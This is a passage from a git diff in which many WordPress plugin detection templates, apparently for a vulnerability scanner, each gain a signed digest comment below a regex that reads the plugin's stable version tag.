a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c461fbad6224cd2e79684aa4c7696bb613cd66e824ced0826cf59df1d6ea31d02203c34dd350830ead087319b872f7e22d6f710bf84a48ab01f0c8abdb8cacb405c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..85be79041c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100886757c2c4be03a6140ecf9c615adc7aaa39cb31aa68f6a2c92f667411f51757022100b38724cce6025d80669a11bdb77cba2da074716a5fbdeb6dea91f1029f778203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..dd5cbbda37 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ca51742238920118970fa037f940c18b408982481f14171d862a3c0bb0efd67402205a1cf526e03edeeca23802ada9479f7e84bbd13b77e698e4c616d10c81e72de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..0b5e065862 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bbbd9abcec54004cdeed5a81c9e5cd667a01ba8591acc3a8d57b4e20e5177d71022100df74c211222d8f78aca4ee1e6b3b89b5cc22d8e8601e713e8a86af7483a7b63c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..103e0b6ea9 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100de339b27c1381daf28c5b939c3042a0c1308580437bb0d8491d32efb159832ab02204e47729fee872211f7c88f10a39dc52dfad6f5c573a3ac58c7bca38cb8b9f328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..4f6de9f676 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220311a16cf89553300f6b812b55a2db3098a576c40f2dcd84a64a2705e602235d002203d7d5f209b954ff0eef002fb848d9354d1425bd75a4c3e37d6f00c839d91b973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..31dd7378a1 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022068f3d2f90114640c9b28fd3ace271568f835262b2be5458c668e4731536b1780022035c03a1c9d918078a8f5e684366adb7eeb6c78dc9a30423ef4576c162b5f57b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..906b734d43 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c193cecb945bddd56644805a1b4496f112e0b96ae2dd14fb4b1d2b3a79e911a602205e233f9cc99c085ca3aad58cad4d82eab17ae5235b0b6da8659551027cbe4d90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..17a89b4c3a 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206962da53b622985737ebd6f4344da10f8ab8965c8523f56c3d0364fb027f0d0002201e9d3c61783593e0f3d871763c84d7ccae9077966b2f5eeea96452c27c6fdb67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..8c5a26a3b9 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207266a14b82584e2bdce1bb28f9613523e387bd2d529197fed3080aaa0ab29155022100cbbf71d0b5b5cb6902036f88fadbb1fb8658846194a8d3854b62f763b2aa164f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..7b34074df9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a8e511c2a27fa56470c40337a9c2b40ea13bc8aa4ce6026b97ee358480d3f71a02204775a1de76712044d665ce897427bbfd1fd85d4ebee3653834d81720736acca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..5bb3a809af 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e79460149f2efa73b3237e7c20db78a918e6b2a8832d1ec65da6ca5158f9735022022b60aa0f0d8143684c6bd49f034149f9a0c6b82547ecc65e1354ca9b38582ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..96faf84ecc 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cf3372837f9c56f657ae6253f73e79df9609fe5a33615af26cc9057e107f69ab022100c2ff199e77d5a04ce1b464cc412df904188d2a0f23711e6717dba0be71da17e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..421738b597 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a2989753cde506f38abaf6ca4eec4290c6d0ae49775adc3c736e615e6c0b7721022100e47da083ffd0fdce39a527ebc758f9956c0e292ae09733f499b08863b74db87a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..f1dee41315 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220460f61d9a542d60583b21b1556844392811f18b675c37c3b2c28162f75243807022036bf6a515dc26e5292a0d2011c6155f1abf46882239773f6589576c9ad90a278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..00495b4fad 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7365018b1f6f5969cdfb0e1c0dcbbe9d0e80a5685d4701de45379468ab2a10d022057b0deabe402137e39f6c04eb355ded7a5da1fc8a210e6e24aeff759a13048aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..3290537c0b 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c783c01507c60e0c0c7a9cc81422038ea5a769b5fe050c305f0810e95db659e20221009889fc74a90a1be24ed9779d7b497b2489bcf5c7e94388442f040ed386f027a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..ead6a2d81f 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203cbbae6c71ab377e4857fb614df1745c7d36d00a5eaeebedd94bf89026a2b62a022100b6e1d42348061d0b0b04e421741b24fadfd2627951439ba28fb111d04446b475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..e3bcfc7eab 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207653c380b5dff639dc18f7265dd4e6c98c584b90fbd77207aef00bf37fa1ca670220116a065c47b2b81a53dce4eaed7b61958f78c6338ef91a1f3b9600f993c23486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..213b8e42ee 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b9f27d5823714588ee81c5cb68b22e0435e8a20bc11967de5c4ac6ece838fadc02202cd2e2649cb444515f296c34f32deac99ceaad1c12a83fa46985880e667f501b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..add7a0960c 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f7df1d405d363bbd5708b905253f1c5a8858b6afe547ac3deb39b7b52f66492c0220135129e2650cf77e84d05b9004dc135ae98d3ebb422dff33bc2aa808392e87b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..9655702863 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c0dcb9a8b8e309b6a44996cdf66c7bb2335ff353d560a10174e113638b0c119f02200423efb2848d4a981ae15fc46e7831af33fd114a5146d8800c2c1c955bf6acfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..60a6891245 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220214d0825e24a9eb22af962b981363eb6edfabf0d660630290647647815a9bce7022016e457ada42eac12ab704212a4871d0cc06e8a69ee0ba797ce510b68d30e898b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..0294a31b09 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206052789f348df99cfc82c80b5e74255f2402bbc07d6ed9a8b5cdf006673309de02200ef4fdd8eb6a2f0a8a122fd660a67cb8e5acc9355dfbf6cffac6476f80630c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..62e8c97008 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022006493222ab3c0e8cd63537479f2f4acd9939ec86752412bd3c5cca27c9fc03f402210092a402a8067e704ecf3f175a60f9f9606a069b494b471202b6143a223c7167f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..ef28909193 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100be79afae81a04b29c839636d125cc3f6b0653a945fa1e7fca5ce76b83cb78f56022100f9f5f6255b214d1688820f2d75e179712e98f2a4bad16a2f935afe2375e271ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..9354de6207 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022004cf52ba5e8ae664be41ec07ae30517dddec9048111d703e1e40eac5a3c5c0a6022100f97166baa3feec56730bf056cc06753f6808726745112eb3e0a3b564fd1caf47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..41766e5ebc 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e55e0b831151a4586fce3146817209a2a76fbcc69ec51d73e88e894db1371081022100aeb640da3e9d392f9384afd583df237a83be77adf479d0f6448465a8116c0fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..513ded8c8b 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cbc55b075a08afe4e52efa72b9b25e760a3b70696ec60802dd320c8461cac22a022100d2cc5f73e71868ad7cbadad247d3a1d60191fbea9cf83be5cd35e9e4102fb047:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..336c12cad0 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb01feed0c635f91ee9fda72234ff3f227ab4ac7f780f24f8ccb66d608ea39a50220529bfc01e064943c7c9d7bc6175fed16218e46430bdb0b2a274fd3ea6f7f692d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..c55140c572 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022029b90e468558d958779ec9e24ee53d7b6ffec1e7e3fc404f2abb08478b42a42c02201af3d1c18e1f395acdec8f59e0283c225044e7e6c61a06af895045277b89199d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..1a2b08a62e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fcdf130e841d81f576a8810bbf7b41fc44e6b8c411c57430970b13f463d039f5022072562aa4854269af9ba31b8a0af771e9c4490e68814d4525becd802f905aa6e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..ca55eb1f5c 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f1adf71fbef6a6028e22db0c865ecd2984dbaec35068c47d29386f1a2f7086a0022071737071c955eb0a710dc5959a116e0a6f3759381c37bd3fc6b1b44bd0abd51e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..edc9bbe158 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022012e06226839a4860e17cdf2aa5a8733f6a7ba763919983f2af79f5c9c86c45fa02206c8ab4122aeef31b451b255def594178301cafc9cd18ee543a202d85eb096777:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..45230e9df8 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220321dcdb1a9836e39576c463a5e6b92efed5e9c7142df5bd7d8a4ea9e21207dab0220726e015dfc3891c36ce11f0bda4c193d03be49c25ed8acb6c3657ae874475458:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..e963a15de6 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d05cc9fddd823566dc3cf99d8f578a9c71d276b3e33ab68cbcc43739facf284022100bb35fddabca52e6715716925568a88c2aa8f278b39c8e5e70da6d79936c74f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..05da4648d0 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008fb381bfd150785740795ae83a1f1338ff9c001bbddb5006d81b43bb3e08cbc70220792728ef927592029829592c7675b2d0f5c98e3fffbe2ae6756bdd7a4b191e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..420cf2768e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d430a2505655390f80e3158b7d8ab0b4b0edadb735da377bb48acf5dd85d8a7802202c5690ba7be0e529503bb29ac4dd7326cf9e9c4c87cd4aff36b6a3014c36da60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..d7c3a0be2e 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205e964749fc818a724cdd65df8809aa7a2555e5f200bf10a385f4a5f65ae79c6802200efee4eb4a2a444f8363a69d3bb7c7b30532c6e6352c06bc2f36ec4d06811acb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..a6fbdf5fad 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009efcf610667fc510e75cc9e4d5b55d1c806f601a6e5207277c274b7f4a34ccdb0220644f5946293645ffbb76bbd3b1cc82a5d3af6c99544a0712f0dcaea2f46c7ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..e116d159f0 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205d1fc2291e1d76700740d674eeeb10e60e0f0027a045c2dbbcaa6420f4e2cbcb0220138a5ee6f106d262693f929c5cca9e8a34618c8945bca09a1efbac7d61122825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..ac22216437 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fe4a57a12aad1bfa3351a7ac84049f26eb0b0d90c71c62fd0c0d86c90b3dc45b022100f065114d9832d94d77eedbf135d4c5219ccb6afb44b1c1fab735642e93c1ad98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..49e2e708e2 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022016e59e0e29263a4e26845ecd62b73df3cb43a2293bf0013192bac2d99cdebe0d022100a022bcf583a28a18b9f783c9b386f395eb163b6ed3cddeb3027a12aa80d00344:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..81579cf8ef 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210085394b19104204bfab3019418d98a59e7b1467e508c6206cb1860f527c3460eb02206b69946947cbf7887ab4528318c7c646eda7f3e18336f0cd17712cd08bc93a20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..3256916ff3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220288e816019f9a93e3422e223e8e0b7f91696a4d2af0250b9c77cc50114c04c3a022015b5b6161d3d20962d70586fe6207a4852a6ae5e7b2b6d4229de04b6e58ec944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..43008ee34d 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db485e98aae98b5fd1138be3bbc06e549ebaebc0b20269b72ebb85a5f9024a14022033e7de8b7a8615289b4ada552485970afca5806f39a6874a54750c78cc0a6227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..f4239d0735 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210094b3421b420f16580725a50fa562721b64a25cd873d15394e861ba7829aa88d2022100a3e22010a3683b56ab1f64d843949c266b7dbd51eddad8303c1fec1f273b53e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml 